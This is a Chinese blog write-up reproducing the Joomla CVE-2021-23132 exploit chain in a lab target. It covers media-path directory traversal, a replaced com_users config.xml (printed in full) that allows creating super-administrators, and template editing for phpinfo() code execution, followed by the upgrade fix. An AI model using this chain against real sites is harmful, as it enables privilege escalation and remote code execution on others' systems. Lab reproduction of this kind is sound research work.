【漏洞复现 CVE-2021-23132】Joomla远程代码执行漏洞

0x01 描述

Joomla是一套知名的内容管理系统,其使用PHP语言和 MySQL数据库开发,可以在Linux、 Windows、MacOSX等各种不同的平台上运行
在Joomla 3.0.0到3.9.24版本中,Joomla!的com_media组件配置允许被任意修改导致Web级别目录遍历,攻击者通过一系列操作,进一步会导致远程命令执行。

0x02 漏洞编号

CVE-2021-23132

0x03 漏洞等级

CVSS:7.5
威胁等级:高危````

0x04 影响范围

3.0.0 <= Joomla! <= 3.9.24

0x05 公开POC

https://github.com/HoangKien1020/CVE-2021-23132

0x06 漏洞复现

环境搭建

使用VULFOCUS靶场,一键拉取镜像

以普通管理员身份登录系统。切换到“media”

点击“option”,修改Path to Files Folder路径为当前路径“./”
可以看到这里可以操作整个web目录下的文件夹及文件,实现了目录遍历。

在/administrator/components/com_users下,删除config.xml文件

并重新上传config.xml文件,内容如下

<?xml version="1.0" encoding="utf-8"?>
<config>
  <fieldset
    name="user_options"
    label="COM_USERS_CONFIG_USER_OPTIONS" >
    <field
      name="allowUserRegistration"
      type="radio"
      label="COM_USERS_CONFIG_FIELD_ALLOWREGISTRATION_LABEL"
      description="COM_USERS_CONFIG_FIELD_ALLOWREGISTRATION_DESC"
      class="btn-group btn-group-yesno"
      default="1"
      >
      <option value="1">JYES</option>
      <option value="0">JNO</option>
    </field>

    <field
      name="new_usertype"
      type="usergrouplist"
      label="COM_USERS_CONFIG_FIELD_NEW_USER_TYPE_LABEL"
      description="COM_USERS_CONFIG_FIELD_NEW_USER_TYPE_DESC"
      default="2"
      checksuperusergroup="0"
    />

    <field
      name="guest_usergroup"
      type="usergrouplist"
      label="COM_USERS_CONFIG_FIELD_GUEST_USER_GROUP_LABEL"
      description="COM_USERS_CONFIG_FIELD_GUEST_USER_GROUP_DESC"
      default="1"
      checksuperusergroup="0"
    />

    <field
      name="sendpassword"
      type="radio"
      label="COM_USERS_CONFIG_FIELD_SENDPASSWORD_LABEL"
      description="COM_USERS_CONFIG_FIELD_SENDPASSWORD_DESC"
      class="btn-group btn-group-yesno"
      default="1"
      >
      <option value="1">JYES</option>
      <option value="0">JNO</option>
    </field>

    <field
      name="useractivation"
      type="list"
      label="COM_USERS_CONFIG_FIELD_USERACTIVATION_LABEL"
      description="COM_USERS_CONFIG_FIELD_USERACTIVATION_DESC"
      default="0"
      >
      <option value="0">JNONE</option>
      <option value="1">COM_USERS_CONFIG_FIELD_USERACTIVATION_OPTION_SELFACTIVATION</option>
      <option value="2">COM_USERS_CONFIG_FIELD_USERACTIVATION_OPTION_ADMINACTIVATION</option>
    </field>

    <field
      name="mail_to_admin"
      type="radio"
      label="COM_USERS_CONFIG_FIELD_MAILTOADMIN_LABEL"
      description="COM_USERS_CONFIG_FIELD_MAILTOADMIN_DESC"
      class="btn-group btn-group-yesno"
      default="0"
      >
      <option value="1">JYES</option>
      <option value="0">JNO</option>
    </field>

    <field
      name="captcha"
      type="plugins"
      label="COM_USERS_CONFIG_FIELD_CAPTCHA_LABEL"
      description="COM_USERS_CONFIG_FIELD_CAPTCHA_DESC"
      folder="captcha"
      filter="cmd"
      useglobal="true"
      >
      <option value="0">JOPTION_DO_NOT_USE</option>
    </field>

    <field
      name="frontend_userparams"
      type="radio"
      label="COM_USERS_CONFIG_FIELD_FRONTEND_USERPARAMS_LABEL"
      description="COM_USERS_CONFIG_FIELD_FRONTEND_USERPARAMS_DESC"
      class="btn-group btn-group-yesno"
      default="1"
      >
      <option value="1">JSHOW</option>
      <option value="0">JHIDE</option>
    </field>

    <field
      name="site_language"
      type="radio"
      label="COM_USERS_CONFIG_FIELD_FRONTEND_LANG_LABEL"
      description="COM_USERS_CONFIG_FIELD_FRONTEND_LANG_DESC"
      class="btn-group btn-group-yesno"
      default="0"
      showon="frontend_userparams:1"
      >
      <option value="1">JSHOW</option>
      <option value="0">JHIDE</option>
    </field>

    <field
      name="change_login_name"
      type="radio"
      label="COM_USERS_CONFIG_FIELD_CHANGEUSERNAME_LABEL"
      description="COM_USERS_CONFIG_FIELD_CHANGEUSERNAME_DESC"
      class="btn-group btn-group-yesno"
      default="0"
      >
      <option value="1">JYES</option>
      <option value="0">JNO</option>
    </field>

  </fieldset>

  <fieldset
    name="domain_options"
    label="COM_USERS_CONFIG_DOMAIN_OPTIONS"
    >

    <field
      name="domains"
      type="subform"
      label="COM_USERS_CONFIG_FIELD_DOMAINS_LABEL"
      description="COM_USERS_CONFIG_FIELD_DOMAINS_DESC"
      multiple="true"
      layout="joomla.form.field.subform.repeatable-table"
      formsource="administrator/components/com_users/models/forms/config_domain.xml"
    />
  </fieldset>

  <fieldset
    name="password_options"
    label="COM_USERS_CONFIG_PASSWORD_OPTIONS" >
    <field
      name="reset_count"
      type="integer"
      label="COM_USERS_CONFIG_FIELD_FRONTEND_RESET_COUNT_LABEL"
      description="COM_USERS_CONFIG_FIELD_FRONTEND_RESET_COUNT_DESC"
      first="0"
      last="20"
      step="1"
      default="10"
    />

    <field
      name="reset_time"
      type="integer"
      label="COM_USERS_CONFIG_FIELD_FRONTEND_RESET_TIME_LABEL"
      description="COM_USERS_CONFIG_FIELD_FRONTEND_RESET_TIME_DESC"
      first="1"
      last="24"
      step="1"
      default="1"
    />

    <field
      name="minimum_length"
      type="integer"
      label="COM_USERS_CONFIG_FIELD_MINIMUM_PASSWORD_LENGTH"
      description="COM_USERS_CONFIG_FIELD_MINIMUM_PASSWORD_LENGTH_DESC"
      first="4"
      last="99"
      step="1"
      default="4"
    />

    <field
      name="minimum_integers"
      type="integer"
      label="COM_USERS_CONFIG_FIELD_MINIMUM_INTEGERS"
      description="COM_USERS_CONFIG_FIELD_MINIMUM_INTEGERS_DESC"
      first="0"
      last="98"
      step="1"
      default="0"
    />

    <field
      name="minimum_symbols"
      type="integer"
      label="COM_USERS_CONFIG_FIELD_MINIMUM_SYMBOLS"
      description="COM_USERS_CONFIG_FIELD_MINIMUM_SYMBOLS_DESC"
      first="0"
      last="98"
      step="1"
      default="0"
    />

    <field
      name="minimum_uppercase"
      type="integer"
      label="COM_USERS_CONFIG_FIELD_MINIMUM_UPPERCASE"
      description="COM_USERS_CONFIG_FIELD_MINIMUM_UPPERCASE_DESC"
      first="0"
      last="98"
      step="1"
      default="0"
    />

    <field
      name="minimum_lowercase"
      type="integer"
      label="COM_USERS_CONFIG_FIELD_MINIMUM_LOWERCASE"
      description="COM_USERS_CONFIG_FIELD_MINIMUM_LOWERCASE_DESC"
      first="0"
      last="98"
      step="1"
      default="0"
    />

  </fieldset>

  <fieldset
    name="user_notes_history"
    label="COM_USERS_CONFIG_FIELD_NOTES_HISTORY" >

    <field
      name="save_history"
      type="radio"
      label="JGLOBAL_SAVE_HISTORY_OPTIONS_LABEL"
      description="JGLOBAL_SAVE_HISTORY_OPTIONS_DESC"
      class="btn-group btn-group-yesno"
      default="0"
      >
      <option value="1">JYES</option>
      <option value="0">JNO</option>
    </field>

    <field
      name="history_limit"
      type="number"
      label="JGLOBAL_HISTORY_LIMIT_OPTIONS_LABEL"
      description="JGLOBAL_HISTORY_LIMIT_OPTIONS_DESC"
      filter="integer"
      default="5"
      showon="save_history:1"
    />

  </fieldset>

   <fieldset
    name="massmail"
    label="COM_USERS_MASS_MAIL"
    description="COM_USERS_MASS_MAIL_DESC">

    <field
       name="mailSubjectPrefix"
       type="text"
      label="COM_USERS_CONFIG_FIELD_SUBJECT_PREFIX_LABEL"
      description="COM_USERS_CONFIG_FIELD_SUBJECT_PREFIX_DESC"
    />

     <field
       name="mailBodySuffix"
      type="textarea"
      label="COM_USERS_CONFIG_FIELD_MAILBODY_SUFFIX_LABEL"
      description="COM_USERS_CONFIG_FIELD_MAILBODY_SUFFIX_DESC"
       rows="5"
       cols="30"
    />

  </fieldset>

  <fieldset
    name="debug"
    label="COM_USERS_DEBUG_LABEL"
    description="COM_USERS_DEBUG_DESC">

    <field
      name="debugUsers"
      type="radio"
      label="COM_USERS_DEBUG_USERS_LABEL"
      description="COM_USERS_DEBUG_USERS_DESC"
      class="btn-group btn-group-yesno"
      default="1"
      >
      <option value="1">JYES</option>
      <option value="0">JNO</option>
    </field>

    <field
      name="debugGroups"
      type="radio"
      label="COM_USERS_DEBUG_GROUPS_LABEL"
      description="COM_USERS_DEBUG_GROUPS_DESC"
      class="btn-group btn-group-yesno"
      default="1"
      >
      <option value="1">JYES</option>
      <option value="0">JNO</option>
    </field>

  </fieldset>

  <fieldset name="integration"
    label="JGLOBAL_INTEGRATION_LABEL"
    description="COM_USERS_CONFIG_INTEGRATION_SETTINGS_DESC"
  >

    <field
      name="integration_sef"
      type="note"
      label="JGLOBAL_SEF_TITLE"
    />

    <field
      name="sef_advanced"
      type="radio"
      class="btn-group btn-group-yesno btn-group-reversed"
      default="0"
      label="JGLOBAL_SEF_ADVANCED_LABEL"
      description="JGLOBAL_SEF_ADVANCED_DESC"
      filter="integer"
      >
      <option value="0">JGLOBAL_SEF_ADVANCED_LEGACY</option>
      <option value="1">JGLOBAL_SEF_ADVANCED_MODERN</option>
    </field>

    <field
      name="integration_customfields"
      type="note"
      label="JGLOBAL_FIELDS_TITLE"
    />

    <field
      name="custom_fields_enable"
      type="radio"
      label="JGLOBAL_CUSTOM_FIELDS_ENABLE_LABEL"
      description="JGLOBAL_CUSTOM_FIELDS_ENABLE_DESC"
      class="btn-group btn-group-yesno"
      default="1"
      >
      <option value="1">JYES</option>
      <option value="0">JNO</option>
    </field>

  </fieldset>

  <fieldset
    name="permissions"
    label="JCONFIG_PERMISSIONS_LABEL"
    description="JCONFIG_PERMISSIONS_DESC"
    >

    <field
      name="rules"
      type="rules"
      label="JCONFIG_PERMISSIONS_LABEL"
      filter="rules"
      validate="rules"
      component="com_users"
      section="component"
    />

  </fieldset>
</config>

添加新用户,可以看到,能直接添加超级管理员权限的用户

使用超级管理员用户,修改Beez3模板的error.php文件
添加语句phpinfo();

访问http://localhost/templates/beez3/error.php,实现代码执行

也可以使用POC来执行代码

获取Flag

0x06 修复建议

建议相关用户升级到3.9.25及以上版本。或者登陆系统后台,系统会提示升级,点击一下完成自动升级即可。

posted @ 2021-08-23 10:35  StarCi  阅读(4750)  评论(1编辑  收藏  举报